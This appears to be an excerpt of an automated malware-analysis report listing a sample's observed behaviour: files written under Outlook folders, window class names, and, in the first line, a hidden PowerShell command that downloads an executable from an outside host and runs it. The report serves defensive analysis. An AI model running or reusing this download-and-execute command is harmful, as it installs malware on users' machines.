Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w Hidden Invoke-WebRequest -Uri "http://scaladevelopments.scaladevco.com/13Z/IMG_0540001825.exe" -OutFile "C:\Users\Public\Documents\educationleader.exe";C:\Users\Public\Documents\educationlea...
- %TEMP%\outlook logging\firstrun.log
- %WINDIR%\inf\outlook\outlperf.h
- %WINDIR%\inf\outlook\0009\outlperf.ini
- ClassName: 'mspim_wnd32' WindowName: 'Microsoft Outlook'
- ClassName: 'rencat' WindowName: ''
- '%ProgramFiles%\microsoft office\office14\outlook.exe' -Embedding